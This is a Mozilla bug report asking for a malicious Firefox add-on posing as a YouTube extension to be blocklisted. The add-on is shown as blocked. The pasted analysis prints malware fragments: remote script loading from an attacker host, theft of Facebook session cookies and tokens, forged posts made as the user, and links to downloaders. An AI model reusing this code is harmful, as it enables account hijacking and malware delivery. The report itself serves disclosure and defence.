Bug 730399
Opened 12 years ago
Closed 12 years ago
Malicious "Youtube" extension
(Toolkit :: Blocklist Policy Requests, defect)
RESOLVED
FIXED
(Reporter: mhammell, Assigned: jorgev)
Attachments
(1 file)
1.55 MB,
application/octet-stream
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Via loading this URL in a browser: http://hosting.muhammad-hasan[.]info/.fb.php?20560543 Wepawet analysis of the URL: http://wepawet.cs.ucsb.edu/view.php?hash=979b88bebb885ab1721297f33ee7e9cf&t=1330108668&type=js Actual results: Report for http://nemanjan00.com/odvale/youtube.xpi ** Embedded and Remote Files ** chrome.manifest update.rdf content/prefman.js content/skin/icon.png content/script-compiler.js content/youtube.js http://nemanjan00.com/odvale/fejs.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul install.rdf ** Embedded Metadata ** em:name="Youtube extension" em:version="1.0.3" em:creator="YOU" em:iconURL="chrome://youtube/content/skin/icon.png" em:description="Plays Youtube Videos Online, Quickly and Efficiently" em:homepageURL="http://ludnica.uk.to/" em:updateURL="http://ludnica.uk.to//update.rdf" em:updateKey="MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDTrfS3V3OMNjIemPFkdJji5dGxg+... <em:targetApplication RDF:resource="rdf:#$lSyBL"/> em:minVersion="2.0" em:maxVersion="10.*" /> ** Files Loaded ** ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... 
em:iconURL="chrome://youtube/content/skin/icon.png" ** Remote Javascript Loaded ** ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul <RDF:Description RDF:about="rdf:#$ZMugE2" </RDF:Description> <RDF:Description RDF:about="rdf:#$0NugE2" <RDF:Description RDF:about="urn:mozilla:extension:youtube@youtube.com" </RDF:Description> var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://nemanjan00.com/odvale/fejs.js"); //setTimeout('javascript:location.reload(true);', 10000) // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... <RDF:Description RDF:about="urn:mozilla:install-manifest" em:description="Plays Youtube Videos Online, Quickly and Efficiently" </RDF:Description> <RDF:Description RDF:about="rdf:#$lSyBL" ** Facebook Paths Accessed ** ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... 
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook\.com/i)) { ** Facebook Cookies Accessed ** var fb_dtsg = Env.fb_dtsg; if (document['getElementsByName']('fb_dtsg')[0] == null) return false; fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; if (document['getElementsByName']('fb_dtsg')[0] == null) return false; fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** <RDF:RDF xmlns:NS1="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> NS1:updateLink="http://ludnica.uk.to/youtube.xpi" // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ blogs[0] = 'http://hummerh2-razlupan.web44.net/?'; blogs[1] = 'http://hosting.muhammad-hasan.info/.fb.php?'; blogs[2] = 'http://kandangwebsite.com/1/.fb.php?'; blogs[3] = 'http://tienda.soydesantarosa.com/.fb.php?'; blogs[4] = 'http://www.odvale.tk/odvale.php?'; blogs[5] = 'http://odvale.us.to/?'; blogs[6] = 'http://nemanjan00.binhoster.com/?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... 
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; //window.location = "http://dl.dropbox.com/u/55258798/AntiSpam.exe"; ... '<center><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loa... //setTimeout('top.location=\'http://adf.ly/5b0tf\';', 10000) ...//setTimeout('top.location=\'http://dl.dropbox.com/u/55258798/Server/Downloader.... s.setAttribute("src", "http://nemanjan00.com/odvale/fejs.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... <RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> em:homepageURL="http://ludnica.uk.to/" em:updateURL="http://ludnica.uk.to//update.rdf" Expected results: It should not steal your Facebook cookies and post to Facebook as you without your consent or knowledge. This add-on is being served in conjunction with a Java exploit (see wepawet analysis above).
Comment 1•12 years ago
Id: youtube@2youtube.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Comment 2•12 years ago
https://addons.mozilla.org/en-US/firefox/blocked/i71
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Updated•8 years ago
Product: addons.mozilla.org → Toolkit